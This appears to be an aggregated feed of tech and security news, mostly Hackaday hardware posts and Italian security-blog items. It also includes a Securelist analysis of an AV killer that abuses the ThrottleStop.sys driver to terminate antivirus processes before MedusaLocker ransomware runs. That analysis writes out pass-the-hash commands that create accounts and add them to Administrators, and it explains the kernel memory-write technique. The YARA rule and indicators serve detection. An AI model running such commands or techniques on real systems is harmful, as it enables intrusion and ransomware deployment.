La documentazione ufficiale di Microsoft spiega che in precedenza Exchange Server utilizzava “un servizio principale condiviso con la stessa applicazione di Exchange Online” per funzionalità ibride come la condivisione del calendario e le immagini del profilo utente. La vulnerabilità consente scenari di attacco sofisticati in cui gli avversari con accesso amministrativo iniziale ai server Exchange locali possono aumentare i privilegi all’interno di ambienti cloud connessi..

Questa caratteristica lo rende particolarmente pericoloso per le organizzazioni con distribuzioni Exchange ibride, poiché un singolo server locale compromesso potrebbe fornire un accesso cloud esteso.

Microsoft ha dichiarato che non è stato osservato alcuno sfruttamento della vulnerabilità alla data dell’annuncio, sebbene i ricercatori di sicurezza abbiano dimostrato attacchi proof-of-concept.

L'articolo Una nuova Vulnerabilità critica scoperta in Microsoft Exchange Server: il CISA Avverte proviene da il blog della sicurezza informatica.

The hackers over at [HTX Studio] built a set of twenty trash cans which can automatically catch and remove rubbish.

In order to catch trash a bin needs to do two things: detect where trash will land; and then get there, fast. The second part is easy: three big motors with wheels under the bin. But how does a bin know where the trash will land? It uses a camera installed in the bin itself for that.

[HTX Studio] iteratively trained a model to process visual information from the camera to identify common types of trash. When it sees a trained object flying through the air it rushes to catch it where it will land. After many rounds of fine-tuning it finally started to work reliably.

Once the basic function was working they had some fun creating various specialized variants. One to mop the floor; one to play rock-paper-scissors with you, sort of; and one with an automatic lid, which can be used to “talk trash”. After these three came the ultimate bin: The Punishment Bin, which can fire soft darts.

In addition to the twenty bins themselves they made a recharge station with six bays containing magnetic contact points for recharging the batteries, and a heat-seal mega bin which can empty the smaller bins and put new garbage bags into them. They added LED lighting into the floor of the studio which is used to direct the small bins to the mega bin to be emptied automatically at night time when the office lights go out.

If you’re thinking you’ve seen something like this before, we covered something similar back in 2012.

youtube.com/embed/H0XYANRosVo?…

Thanks to [Jack] for sending this one in.

hackaday.com/2025/08/06/automa…

OpenAI have just released gpt-oss, an AI large language model (LLM) available for local download and offline use licensed under Apache 2.0, and optimized for efficiency on a variety of platforms without compromising performance. This is their first such “open” release, and it’s with a model whose features and capabilities compare favorably to some of their hosted services.

OpenAI have partnered with ollama for the launch which makes onboarding ridiculously easy. ollama is an open source, MIT-licensed project for installing and running local LLMs, but there’s no real tie-in to that platform. The models are available separately: gpt-oss-20b can run within 16 GB of memory, and the larger and more capable gpt-oss-120b requires 80 GB. OpenAI claims the smaller model is comparable to their own hosted o3-mini “reasoning” model, and the larger model outperforms it. Both support features like tool use (such as web browsing) and more.

LLMs that can be downloaded and used offline are nothing new, but a couple things make this model release a bit different from others. One is that while OpenAI have released open models such as Whisper (a highly capable speech-to-text model), this is actually the first LLM they have released in such a way.

The other notable thing is this release coincides with a bounty challenge for finding novel flaws and vulnerabilities in gpt-oss-20b. Does ruining such a model hold more appeal to you than running it? If so, good news because there’s a total of $500,000 to be disbursed. But there’s no time to waste; submissions need to be in by August 26th, 2025.

hackaday.com/2025/08/06/openai…

Ferrofluid is fun. You’ve probably seen all kinds of demos with it bouncing around in response to magnetic fields, or dancing near a speaker. [beastie417] decided to turn the entertaining fluid into a display.
The basic concept of the ferrofluid display. Note the header image of this article shows the electromagnet array without the ferrofluid pane in place.
The concept is straightforward enough. First, construct a tank of ferrofluid with a white panel behind it for contrast. Then, place it in front of a grid of electromagnets. Now you have many “pixels” you can turn on and off. You turn a magnet on to attract ferrofluid to that point, and turn it off to let it fall away. Since the ferrofluid contrasts with the white background, you have a viable display!

[beastie417] notes that while the concept is simple, the execution is hard. Ferrofluid can be very difficult to work with, instantly staining many materials like acrylic and even glass that isn’t properly prepared. It can also be quite expensive to construct a display like this, with [beastie417] noting their 16×12 pixel design costing approximately $700 thus far. Then you have to figure out how to drive all the pixels—this project uses DRV8908 coil driver ICs running off a microcontroller which controls the display and handles animations.

We’ve seen some great ferrofluid displays before, like this neat build that could even create readable glyphs. Meanwhile, if you’re doing rad things with the coolest fluid of the new millennium, don’t hesitate to let us know!

hackaday.com/2025/08/06/2025-o…

The regular Raspberry Pi line is a flexible single-board computer, but sometimes you might find yourself wishing for a form factor that was better designed for installation into a greater whole. This is why the Compute Module variants exist. Indeed, leveraging that intention, [Hans Jørgen Grimstad] has used the powerful Compute Module 5 as the heart of his “Overlord” robot controller.

The Compute Module 5 offers a powerful quad-core 64-bit ARM chip running at 2.4 GHz, along with anywhere from 2 to 16GB of RAM. You can also get it with WiFi and Bluetooth built in onboard, and it comes with a wide range of I2C, SPI, UART, and GPIO pins to serve whatever ends you envision for them. It’s a whole lot of capability, but the magic is in what you do with it.

For [Hans], he saw this as a powerful basis for a robot controller. To that end, he built a PCB to accept the Compute Module 5, and outfit it with peripherals suited to robotics use. His carrier board equips it with an MCP2515 CAN controller and a TJA1051 CAN transceiver, ideal for communicating in a timely manner with sensors or motor controllers. It also has a 9-axis BNO055 IMU on board, capable of sensor fusion and 100Hz updates for fine sensing and control. The board is intended to be easy to use with hardware like Xiaomi Cybergear motors and Dynamixels servos. As a bonus, there is power circuitry on board to enable it to run off anything from 5 to 36V. While GPIOs aren’t exposed, [Hans] notes that you can even pair it with a second Pi if you want to use GPIOs or camera ports or do any other processing offboard.

If you’re looking for a place to start for serious robot development, the Overlord board has plenty of capability. We’ve explored the value of the Compute Module 5 before, too. Meanwhile, if you’re cooking up your own carrier boards, don’t hesitate to let the tipsline know!

hackaday.com/2025/08/06/a-robo…

On an old fashioned bench a signal generator was once an indispensable instrument, but has now largely been supplanted by the more versatile function generator. Sometimes there’s a less demanding need for a clock signal though, and one way that might be served comes from [Rupin Chheda]’s square wave generator. It’s a small PCB designed to sit at the end of a breadboard and provide handy access to a range of clocks.

On the board is a crystal oscillator running at the usual digital clock frequency of 32.768 kHz, and a CMOS divider chain. This provides frequencies from 2048 Hz down to 0.5 Hz for good measure. It’s a simple but oh-so-useful board, and we can imagine more than a few of you finding space for it on your own benches.

This project is part of our awesome 2025 One Hertz Challenge, celebrating all the things which strut their stuff once a second. It’s by no means the first to feature a 32.768 kHz divider chain, and if you have a similar project there’s still time to enter.

hackaday.com/2025/08/06/2025-o…

When I was a student, I was a diehard Commodore Amiga user, having upgraded to an A500+ from my Sinclair Spectrum. The Amiga could do it all, it became my programming environment for electronic engineering course work, my audio workstation for student radio, my gaming hub, and much more.

One thing that was part of my course work it couldn’t do very well, which was be exactly like the PCs in my university’s lab. I feel old when I reflect that it’s 35 years ago, and remember sitting down in front of a Tulip PC-XT clone to compile my C code written on the Amiga. Eventually I cobbled together a 286 from cast-off parts, and entered the PC age. Alongside the Amiga it felt like a retrograde step, but mastering DOS 3.3 was arguably more useful to my career than AmigaDOS.

It’s DOS, But It’s Not MS-DOS

Where do I want to go today?
I don’t think I’ve used a pure DOS machine as anything but an occasional retrocomputing curio since some time in the late 1990s, because the Microsoft world long ago headed off into Windows country while I’ve been a Linux user for a very long time. But DOS hasn’t gone away even if Microsoft left it behind, because the FreeDOS project have created an entirely open-source replacement. It’s not MS-DOS, but it’s DOS. It does everything the way your old machine did, but in a lot of cases better and faster. Can I use it as one of my Daily Drivers here in the 2020s? There is only one way to find out.

With few exceptions, an important part of using an OS for this series is to run it on real hardware rather than an emulator. To that end I fished out my lowest-spec PC, a 2010 HP Mini 10 netbook that I hold onto for sentimental reasons. With a 1.6 GHz single core 32 bit Atom processor and a couple of gigabytes of memory it’s a very slow machine for modern desktop Linux, but given that FreeDOS can run on even the earliest PCs it’s a DOS powerhouse. To make it even more ridiculously overspecified I put a 2.5″ SSD in it, and downloaded the FreeDOS USB installer image.
Of course a DOS machine runs DOOM, or at least in this case, FreeDOOM.
Installing FreeDOS is simple enough, just a case of booting from the install drive and following the instructions. There’s no automatic disk partitioning, but fortunately due to all that practice in the ’90s I’m a DOS FDISK wizard. I went for the full installation of every FreeDOS package, because with a machine this powerful, why not!

Booting into FreeDOS on a machine this much faster than a DOS-era PC is so fast as to feel almost instantaneous. The tiny size of the executables, the miniscule amount of resources required, and the speed of the SSD ncompared to an MFM or IDE hard drive makes it like no other OS I have tested, not even RiscOS on the Raspberry Pi. It almost doesn’t feel like the DOS I remember!

DOS has two config files for drivers and configuration, and while CONFIG.SYS and AUTOEXEC.BAT have morphed into FDCONFIG.SYS and FDAUTO.BAT they are exactly the same. Yet again, all that experience from the ’90s paid off, and I was immediately at home editing out all the default items relating to things such as a CD-ROM that I just don’t have.

I Wasn’t Networked When I Last Used DOS, And I’m Not This Time Round Either

Sadly this was the closest I came to the web on this machine.
Navigating around the DOS command line I found all the different software that had been installed. There’s a package manager called FDIMPLES to manage it all, though since I had everything on my install medium I used it mostly to see what I had. Yes, it comess with DOOM, in fact in two different versions. I’m most interested for my work in using it with an internet connection though, so before I could try Arachne or Dillo to browse the web I needed to set up a network connection. And here I hit my first FreeDOS snag. It comes witht he excellent Crynwyr colelction of DOS network card drivers, but sadly the RealTek chip or the Broadcom wireless card in the HP are both too new to even have a DOS driver. So I could look at Arachne, but not do anything with it.

If I can’t write for Hackaday in a browser on this machine, can I use a word processor? Sadly there’s none included in the package list, but the FreeDOS website suggests Ability Plus. This is a former commercial package now freeware, so I downloaded it and transferred it to the HP. Sadly no matter what memory configurations I tried, I couldn’t get it to run. For a laugh I also tried Microsoft Word 5.5 which also refused to run, but given Microsoft’s shenanigans with DR DOS back in the day, that was hardly a surprise. I’m not giving up though, so this is being written in the FreeDOS editor.

A Distraction-Free Writing Powerhouse

For the past couple of months then, this quaint old laptop with a space-helmeted Wrencher sticker on the front has been my occasional companion. It’s been on the road with me, on the Eurostar through the Channel Tunnel, and into more than one hackerspace. Using DOS again has been an interesting experience, and sometimes frustrating when it comes to mixing up the forward slash and the back slash on returning to Linux, but it’s not been an unpleasant one. For a start, this is probably the fastest-responding computer I own, then there’s the distraction-free aspect of it, with no networking and a single-tasking user interface I have nothing to get in the way of my writing. Oddly I don’t remember my old 286 being like this, but the truth is I must never have appreciated what I had. Getting your work off a DOS machine with no network, floppy, or serial port is a little inconvenient and involves booting from a USB installation medium, but being honest that’s probably less of a chore than using a LapLink serial cable was back in the day.

If you need no-frills and no distraction computing and don’t mind forgoing drivers for all but the most ancient peripherals, then try FreeDOS. If it’s not quite the DOS for you but you still want to put a toe in the open-source DOS water, an alternative might be the DR-DOS derived SvarDOS, and if you want the real thing but don’t mind the version everyone hated, there’s always MS-DOS version 4. For myself though, I think I’ll stick with FreeDOS. Of all the operating systems in this series so far it’s the only one I’m going to hang on to; this little HP will come out of the drawer whenever I need to just go away and write something.

hackaday.com/2025/08/06/jennys…

Having a chiller is often essential for the chemistry laboratory, but what if you’re somewhere without easy access to water, nevermind a mains outlet to plug your usual chiller into? In that case you can build a portable one that will happily run off the 12 VDC provided by a mobile source like the accessory outlet in a car while reusing the water from its reservoir, as demonstrated by [Markus Bindhammer] in a recent video.

The build uses a compressor-based freezer as the base, which is significantly more capable than the typical Peltier-cooled refrigerators that cannot cool as fast or efficiently. The changes he made involve running in- and outlet tubing into the freezer’s compartment, with a submerged 12 VDC water pump providing the water to the outlet. This pump is controlled by a variable speed controller board that’s put in a box on the outside with the power lead also sneaking into the freezer. With these modifications in place the freezer’s functionality isn’t significantly impacted, so it can be used as normal.

After filling the compartment with water, the lid is closed and the freezer engaged. The pump controller is then switched on, with the water flow adjusted to fit the distillation job at hand. Although in this case a fairly small freezer was modified, nobody is saying that you cannot also do it with a much larger freezer, and fill it with ice cream and other treats to help it and lab critters cool down faster.

youtube.com/embed/eRXgIcXboKU?…

hackaday.com/2025/08/06/a-port…

Mentre l’ondata di caldo e il desiderio di una pausa estiva spingono milioni di persone verso spiagge e città d’arte, i criminali informatici non vanno in vacanza. Anzi, approfittano proprio di questo periodo per intensificare le loro attività, puntando su bersagli che in questo momento gestiscono una quantità enorme di dati sensibili: gli hotel, in particolare quelli di lusso.

Di recente, sui forum clandestini del dark web, è apparso un post che ha sollevato un’allerta significativa tra gli esperti di sicurezza informatica.

Un utente ha messo in vendita una “ampia collezione di 38.000 immagini scansionate ad alta risoluzione di documenti d’identità e passaporti degli ospiti” di un hotel a 4 stelle situato a Venezia. L’autore dell’annuncio ha specificato che i dati sono stati ottenuti tramite un “accesso non autorizzato nel luglio 2025”, sottolineando la loro freschezza.

Il post, pubblicato sulla nota piattaforma underground DarkForums, includeva anche degli esempi (debitamente censurati nell’immagine sottostante) di documenti d’identità dei clienti dell’hotel, molti dei quali appartenenti a cittadini italiani.

La vendita di questi dati rappresenta una minaccia concreta e multifattoriale.

Con l’identità digitale di una persona a disposizione, i criminali possono compiere una serie di attività illecite, tra cui:

• Furto di identità: Le informazioni contenute nei documenti (nome, cognome, data di nascita, luogo di residenza e, in alcuni casi, codice fiscale) possono essere usate per aprire conti bancari fraudolenti, richiedere prestiti a nome della vittima o stipulare contratti di telefonia e altri servizi.
• Accesso a servizi finanziari: Le copie dei documenti possono essere utilizzate per superare le verifiche “Know Your Customer” (KYC) richieste da molte banche e piattaforme di scambio di criptovalute.
• Truffe mirate: I criminali possono sfruttare queste informazioni per creare truffe di “phishing” o “smishing” (via SMS) estremamente convincenti, in cui si fingono enti governativi o istituzioni finanziarie per estorcere ulteriori dati o denaro.
• Ricatto: La conoscenza dei dati personali può essere usata per minacciare o ricattare le vittime.

Il fatto che il furto sia avvenuto in un hotel di lusso aggiunge un ulteriore livello di preoccupazione. Gli ospiti di strutture di questo tipo sono spesso persone facoltose o di alto profilo, rendendole bersagli ancora più appetibili per i criminali, che puntano a un guadagno maggiore e a un potenziale accesso a reti di contatti e informazioni sensibili.

Questo incidente è un monito che la sicurezza dei dati non va in vacanza.

Per i viaggiatori, è fondamentale essere consapevoli dei rischi e, per quanto possibile, verificare le politiche di sicurezza delle strutture ricettive. Per gli operatori del settore alberghiero, è un richiamo urgente a rafforzare le proprie difese informatiche, in un’epoca in cui un singolo attacco può mettere a rischio la reputazione e la sicurezza di migliaia di persone.

L'articolo Italiani in vacanza, identità in vendita: soggiorno 4 stelle… Sono in 38.000, ma sul dark web proviene da il blog della sicurezza informatica.

Australia is known for great beaches, top-tier coffee, and a laidback approach to life that really doesn’t square with all the rules and regulations that exist Down Under. What it isn’t known for is being a spacefaring nation.

As it stands, a startup called Gilmour Space has been making great efforts to give Australia the orbital launch capability it’s never had. After numerous hurdles and delays, the company finally got their rocket off the launch pad. Unfortunately, it just didn’t get much farther than that.

You Will Not Go To Space Today

Gilmour Space was founded back in 2013, and established its rocketry program two years later. The company has a straightforward mission—it aims to provide Australian-made launch vehicles for putting satellites into orbit. Over the past decade, the company has been working hard on establishing a spaceport and building a series of ever-larger rockets, inching its way towards its stated goal.

The company aims to reach space with the Eris rocket. The 23-meter-long, 30-tonne vehicle came about after years of engineering work, and stands as Australia’s only realistic bid to join the exclusive club of nations capable of orbital launches. The three-stage rocket uses four hybrid rocket motors in the first stage, one in the second stage, and a liquid rocket engine in the third stage. It’s intended to carry payloads up to 300 kg into orbit. The Eris was first assembled and staged on the company’s launch pad in Bowen, Queensland, in early 2024, and even fully fueled up for a dress rehearsal in September last year. However, local aviation authority CASA was not yet satisfied with preparations, and had not provided the required permits for launch. Since then, the wait has continued, with an expected launch date in March 2025 passing by without fanfare. Even with CASA approval, the Australian Space Agency was still not satisfied with Gilmour’s preparations.

Ultimately, the company would wait long eighteen months for complete regulatory approval to launch their Eris rocket from the Bowen orbital spaceport. Ultimately, everything finally fell into place, with the company set to launch on July 30.

youtube.com/embed/4H7Lw8vuS1Q?…

The launch began as so many do, with smoke billowing from the pad as the four first-stage rocket motors ignited. Seconds later, Eris began to inch into the sky… only to falter at low altitude. Having barely cleared the top of the launch structure, the rocket began to fall back to Earth, toppling over sideways while creating a relatively small fireball in its failure. One presumes the payload—a jar of Vegimite sandwich spread—was lost.
Founder Adam Gilmour suggested one of the main engines may have failed during the short 14-second flight. Credit: ABC News via YouTube screenshot
Speaking after the event to ABC News, Gilmour Space founder Adam Gilmour speculated as to what happened. “From the videos, it looks like we lost one of the main engines a few seconds into the flight,” he stated. “I’m hoping the next rocket goes to orbit, and if it does, then the next rocket after that will be our first commercial one that takes satellites up.”

It may not have been much to look at, but the company was nonetheless positive about finally making forward steps towards its eventual goal. “Today, Eris became the first Australian made orbital launch vehicle to lift off from Australian soil — achieving around 14 seconds of flight,” stated the company. “For a maiden test flight, this is a strong result and a major step forward for Australia’s sovereign space capability.” Gilmour Space noted its multiple successes—all four rocket engines igniting successfully, the rocket clearing the tower, and the positive operation of its flight software and control systems. While the launch failed to get far off the pad—for reasons yet to be fully determined—the company was ultimately upbeat, and looks towards its second test flight of the Eris rocket.

youtube.com/embed/hWUQrFSYZqA?…

Indeed, this result has long been expected by Gilmour Space founder, Adam Gilmour. In interviews earlier this year, he noted that the complexities of large scale rocketry meant he didn’t expect grand achievements from the first test flight. “It’s very hard to test an orbital rocket without just flying it,” he told the Sydney Morning Herald in March this year. “We don’t have high expectations we’ll get to orbit… I’d personally be happy to get off the pad.”

Gilmour Space still has a long way to go to reach orbit—roughly 100 km or so, given the rocket only just got off the pad. Still, it’s hardly the first space program to face early failures on its way to the heavens. If anything, the test launch actually happening has reignited interest in the project, bringing renewed attention to the Australian effort to finally join the space club.

hackaday.com/2025/08/06/austra…

No, of course not. Per Betteridge’s law, that’s the answer to any headline with a question mark. On the other hand, while a thermal printer might not cure ADHD, it can help treat it — according to [Laurie Hérault], to the point of curing his procrastination habit. Even if you don’t have ADHD, you probably do procrastinate sometimes, so this hack is worth a look.

The printer itself is a key hardware portion of the hack, but the hack itself is purely organizational. [Laurie] started with post-its before adding automation. Before the post-it notes came a simple realization: [Laurie] could sit and play games for hours, but not buckle down for serious work for more than a few minutes, if he could even get started. (Who can’t relate?) That sent him down a rabbit hole reading about the psychology of what makes games so addictive — and the idea of “gamification” that was so popular in educational circles not long ago.

Unlike work, games give you a loop of unambiguous, instant, and continuous feedback to pump your dopamine circuits. [Laurie] uses the example of an FPS. You aim, you shoot — and either you miss, or you hit the target. Either way, there’s feedback. When you hit, your brain gives you dopamine. This fast loop of input -> feedback is what [Laurie] felt he was missing from his day.

You’d want to organize the post-its better than this. (Image by Pexels.)
That’s where the post-it notes came in. Post-its went up on a board with all of his tasks for the day; the input was his completing the tasks, and the feedback was taking them down, crumpling them up, and putting them into a clear jar that would serve as a score bar for his productivity. The feedback actually rewarded multiple senses this way: the tactility of crumpling paper, the sound of it, and the visual of the rising level of the jar.

A key insight [Laurie] had in this process is that many productivity apps (including gamifying ones) are focused too much on high-level tasks by default. “Clean the kitchen,” for example. That’s too big! It’s daunting, and it takes too long for that immediate, gamified feedback. Instead [Laurie] breaks down “Cleaning the Kitchen” into “Clean the dishes”, “Wipe the Counter”, “Take out the Trash”, et cetera. The smaller the steps, the more frequent the reward, and the easier it is to start them without exerting much willpower: just like a video game.

Of course writing all of those post-it notes gets tedious, especially for recurring and pre-scheduled tasks, and that tedium increases exponentially when breaking tasks down into the smallest possible chunks. That’s where the thermal printer came in. [Laurie] wrote a simple software utility to allow him to create high-level tasks, and break them down into small action items that are immediately sent to the thermal printer. After that, the system works just as it does with the post-it notes. He promises to share this software, but it does not seem to have yet been released. Hopefully he’s not procrastinating on that, or our faith in the process is ruined.

Thermal printers are great for lifehacks, like this hack for receipt-like mementos, or this one to ease the load on a dungeon master. If you prefer you can skip the ‘life’ part of lifehacks, and just make an instant camera.

hackaday.com/2025/08/06/can-a-…

Introduction

In a recent incident response case in Brazil, we spotted intriguing new antivirus (AV) killer software that has been circulating in the wild since at least October 2024. This malicious artifact abuses the ThrottleStop.sys driver, delivered together with the malware, to terminate numerous antivirus processes and lower the system’s defenses as part of a technique known as BYOVD (Bring Your Own Vulnerable Driver). AV killers that rely on various vulnerable drivers are a known problem. We have recently seen an uptick in cyberattacks involving this type of malware.

It is important to note that Kaspersky products, such as Kaspersky Endpoint Security (KES), have built-in self-defense mechanisms that prevent the alteration or termination of memory processes, deletion of application files on the hard drive, and changes in system registry entries. These mechanisms effectively counter the AV killer described in the article.

In the case we analyzed, the customer sought our help after finding that their systems had been encrypted by a ransomware sample. The adversary gained access to the initial system, an SMTP server, through a valid RDP credential. They then extracted other users’ credentials with Mimikatz and performed lateral movement using the pass-the-hash technique with Invoke-WMIExec.ps1 and Invoke-SMBExec.ps1 tools. The attacker achieved their objective by disabling the AV in place on various endpoints and servers across the network and executing a variant of the MedusaLocker ransomware.

In this article, we provide details about the attack and an analysis of the AV killer itself. Finally, we outline the tactics, techniques, and procedures (TTPs) employed by the attackers.

Kaspersky products detect the threats encountered in this incident as:

• Trojan-Ransom.Win32.PaidMeme.* (MedusaLocker variant)
• Win64.KillAV.* (AV killer)

Incident overview

The attack began using valid credentials obtained by the attacker for an administrative account. The adversary was able to connect to a mail server via RDP from Belgium. Then, using Mimikatz, the attacker extracted the NTLM hash for another user. Next, they used the following PowerShell Invoke-TheHash commands to perform pass-the-hash attacks in an attempt to create users on different machines.
Invoke-WMIExec -Target "<IP>" -Domain "<DOMAIN>" -Username "<USER>" -Hash "<HASH>" -Command "net user User1 Password1! /ad" -verbose
Invoke-SMBExec -Target "<IP>" -Domain "<DOMAIN>" -Username "<USER>" -Hash "<HASH>" -Command "net user User2 Password1! /ad" -verbose
Invoke-SMBExec -Target "<IP>" -Domain "<DOMAIN>" -Username "<USER>" -Hash "<HASH>" -Command "net localgroup Administrators User1 /ad" -verbose
An interesting detail is that the attacker did not want to create the same username on every machine. Instead, they chose to add a sequential number to the end of each username (e.g., User1, User2, User3, etc.). However, the password was the same for all the created users.

Various artifacts, including the AV killer, were uploaded to the C:\Users\Administrator\Music folder on the mail server. These artifacts were later uploaded to other machines alongside the ransomware (haz8.exe), but this time to C:\Users\UserN\Pictures. Initially, Windows Defender was able to contain the ransomware threat on some machines right after it was uploaded, but the attacker soon terminated the security solution.

The figure below provides an overview of the incident. We were able to extract evidence to determine the attacker’s workflow and the involved artifacts. Fortunately, the analyzed systems still contained relevant information, but this is not always the case.

Incident flow

This kind of attack highlights the importance of defense in depth. Although the organization had an AV in place, the attacker was able to use a valid account to upload an undetectable artifact that bypassed the defense. Such attacks can be avoided through simple security practices, such as enforcing the use of strong passwords and disabling RDP access to public IPs.

The AV killer analysis

To disable the system’s defenses, the attackers relied on two artifacts: ThrottleBlood.sys and All.exe. The first is a legitimate driver originally called ThrottleStop.sys, developed by TechPowerUp and used by the ThrottleStop app. The application is designed to monitor and correct CPU throttling issues, and is mostly used by gamers. The driver involved in the incident has a valid certificate signed on 2020-10-06 20:34:00 UTC, as show below:
Status: The file is signed and the signature was verified
Serial number: 0a fc 69 77 2a e1 ea 9a 28 57 31 b6 aa 45 23 c6
Issuer: DigiCert EV Code Signing CA
Subject: TechPowerUp LLC
TS Serial number: 03 01 9a 02 3a ff 58 b1 6b d6 d5 ea e6 17 f0 66
TS Issuer: DigiCert Assured ID CA-1
TS Subject: DigiCert Timestamp Responder
Date Signed: 2020-10-06 20:34:00 UTC

When loaded, the driver creates a device at .\\.\\ThrottleStop, which is a communication channel between user mode and kernel mode.

ThrottleStop device driver communication overview

Communication with the driver is carried out via IOCTL calls, specifically using the Win32 DeviceIoControl function. This function enables the use of IOCTL codes to request various driver operations. The driver exposes two vulnerable IOCTL functions: one that allows reading from memory and another that allows writing to it. Both functions use physical addresses. Importantly, any user with administrative privileges can access these functions, which constitutes the core vulnerability.

The driver leverages the MmMapIoSpace function to perform physical memory access. This kernel-level API maps a specified physical address into the virtual address space, specifically within the MMIO (memory-mapped I/O) region. This mapping enables reads and writes to virtual memory to directly affect the corresponding physical memory. This type of vulnerability is well-known in kernel drivers and has been exploited for years, not only by attackers but also by game cheaters seeking low-level memory access. The vulnerability in ThrottleStop.sys has been assigned CVE-2025-7771. According to our information, the vendor is currently preparing a patch. In the meantime, we recommend that security solutions monitor for the presence of this known vulnerable driver in the operating system to help prevent exploitation by EDR killers like the one described in this article.

The second artifact, All.exe, is the AV killer itself. Our analysis began with a basic inspection of the file.

First, we inspected its properties. While searching for relevant strings, we noticed a pattern: multiple antivirus process names inside the binary. The following image shows an excerpt of our query.

AV names inside the binary

We were able to map all the processes that the malware tries to kill. The table below shows each one of them, along with the corresponding vendor. As we can see, the artifact attempts to kill the main AV products on the market.

When the binary is executed, it first loads the ThrottleBlood.sys driver using Service Control Manager (SCM) API methods, such as OpenSCManagerA() and StartServiceW().

ThrottleStop/ThrottleBlood driver loading process

The AV killer needs the ThrottleStop driver to hijack kernel functions and enable the execution of kernel-mode-only routines from user mode. To invoke these kernel functions using the driver’s vulnerable read/write primitives, the malware first retrieves the base address of the currently loaded kernel and the addresses of the target functions to overwrite. It achieves this by utilizing the undocumented NtQuerySystemInformation function from Win32.

Kernel base address gathering

Passing the SystemModuleInformation flag allows the function to return the list of loaded modules and drivers on the current system. The Windows kernel is referred to as ntoskrnl.exe. The base address is always different because of KASLR (Kernel Address Space Layout Randomization).

To perform read/write operations using MmMapIoSpace, the system must first determine the physical address used by the kernel. This is achieved using a technique called SuperFetch, which is packed in the open-source superfetch project available on GitHub. This project facilitates the translation of virtual addresses to physical addresses through a C++ library composed solely of header files.

Physical address calculation

The superfetch C++ library makes use of the NtQuerySystemInformation function, specifically using the SystemSuperfetchInformation query. This query returns all current memory ranges and their pages. With this information, the superfetch library can successfully translate any kernel virtual address to its respective physical address.

Calling kernel functions

Now that the physical base address has been collected, the malware must choose a kernel function that can be indirectly called by a system call (from user mode). The chosen syscall is NtAddAtom, which is rarely used and easily callable through ntdll.dll.

NtAddAtom address collection

By loading ntoskrnl.exe with the LoadLibrary function, the malware, among other things, can easily discover the offset of the NtAddAtom function and thus determine its kernel address by adding the current base address and the offset. The physical address is obtained in the same way as the kernel base. With the physical addresses and driver loaded, the malware can exploit the vulnerable IOCTL codes to read and write the physical memory of the NtAddAtom function.

Kernel code injection using vulnerable driver

To call any kernel function, the AV killer writes a small shellcode that jumps to a target address within the kernel. This target address can be any desired kernel function. Once the function completes, the malware restores the original kernel code to prevent system crashes.

Kernel code injection diagram

Process killer main routine

Having obtained all the necessary information, the AV killer starts a loop to find target processes using the Process32FirstW() and Process32NextW API calls. As we mentioned earlier, the list of target security software, such as MsMpEng.exe (Windows Defender), is hardcoded in the malware.

MsMpEng.exe match found

The AV killer checks all running processes against the hardcoded list. If any match, it kills them by using the vulnerable driver to call the PsLookupProcessById and PsTerminateProcess kernel functions.

If a process is killed, a message indicating this, along with the name of the process, is displayed in the console, as depicted in the following image. This suggests that the malware was being debugged.

MsMpEng.exe was killed

Like most antivirus software available today, Windows Defender will attempt to restart the service to protect the machine. However, the main loop of the program will continue to identify and kill the associated AV process.

Defender tries to restart, but is killed again

YARA rule

Based on our analysis of the sample, we developed the following YARA rule to detect the threat in real time. The rule considers the file type, relevant strings (most of which are related to AV processes), and library function imports.
import "pe"

rule AVKiller_MmMapIoSpace {
meta:
description = "Rule to detect the AV Killer"
author = "Kaspersky"
copyright = "Kaspersky"
version = "1.0"
last_modified = "2025-05-14"
hash = "a88daa62751c212b7579a57f1f4ae8f8"
strings:
$shellcode_template = {4? BA 00 00 40 75 00 65 48 8B}
$ntoskrnl = "ntoskrnl.exe"
$NtAddAtom = "NtAddAtom"
$ioctl_mem_write = {9C 64 00 80}
$ioctl_mem_read = {98 64 00 80}
condition:
pe.is_pe and
pe.imports("kernel32.dll", "DeviceIoControl")
and all of them
}

Victims

Based on our telemetry and information collected from public threat intelligence feeds, adversaries have been using this artifact since at least October 2024. The majority of affected victims are in Russia, Belarus, Kazakhstan, Ukraine, and Brazil.

Attribution

This particular AV killer tool was recently used in an attack in Brazil to deploy MedusaLocker ransomware within a company’s infrastructure. However, this type of malware is common among various threat actors, including various ransomware groups and affiliates.

Conclusion and recommendations

This incident offers several valuable lessons. First, that strong hardening practices must be implemented to protect servers against brute‑force attacks and restrict public exposure of remote‑access protocols. Had the victim limited RDP access and enforced robust password policies, the initial breach could have been prevented. Furthermore, this incident underscores the necessity of defense in depth. The AV killer was able to disable the system’s defenses, allowing the attacker to move laterally across machines with ease. To mitigate such threats, system administrators should implement the following mechanisms:

• Application whitelisting and strict enforcement of least‑privilege access.
• Network segmentation and isolation to contain breaches and limit lateral movement.
• Multi‑factor authentication (MFA) for all remote‑access channels.
• Regular patch management and automated vulnerability scanning.
• Intrusion detection and prevention systems (IDS/IPS) to identify anomalous behavior.
• Endpoint detection and response (EDR) tools for real‑time monitoring and remediation.
• Comprehensive logging, monitoring, and alerting to ensure rapid incident detection.
• Periodic security assessments and penetration testing to validate the effectiveness of controls.

Recently, we have seen an increase in attacks involving various types of AV killer software. Threat protection services should implement self-defense mechanisms to prevent these attacks. This includes safeguarding application files from unauthorized modification, monitoring memory processes, and regularly updating detection rules on customers’ devices.

Tactics, techniques and procedures

The TTPs identified from our malware analysis for the AV killer are listed below.

Indicators of compromise

Vulnerable ThrottleBlood.sys driver
82ed942a52cdcf120a8919730e00ba37619661a3
Malware observed in the incident
f02daf614109f39babdcb6f8841dd6981e929d70 (haz8.exe)
c0979ec20b87084317d1bfa50405f7149c3b5c5f (All.exe)
Other AV killer variants
eff7919d5de737d9a64f7528e86e3666051a49aa
0a15be464a603b1eebc61744dc60510ce169e135
d5a050c73346f01fc9ad767d345ed36c221baac2
987834891cea821bcd3ce1f6d3e549282d38b8d3
86a2a93a31e0151888c52dbbc8e33a7a3f4357db
dcaed7526cda644a23da542d01017d48d97c9533

securelist.com/av-killer-explo…

Reloading filament on a 3D printer is hardly anyone’s favorite task, but it’s even worse when you’re trying to shove stiff filament down a long and winding Bowden tube. Enter the speed loader from [Mr Flippant], which aims to take the pain out of this mechanically-frustrating chore.

The design is simple enough. It’s a small handheld tool that uses a 12 VDC gear motor to drive a set of Bondtech-style drive gears that you might find in an extruder. They’re assembled in a 3D printed housing with a microswitch to activate the motor, and a 9 volt battery to supply the juice.

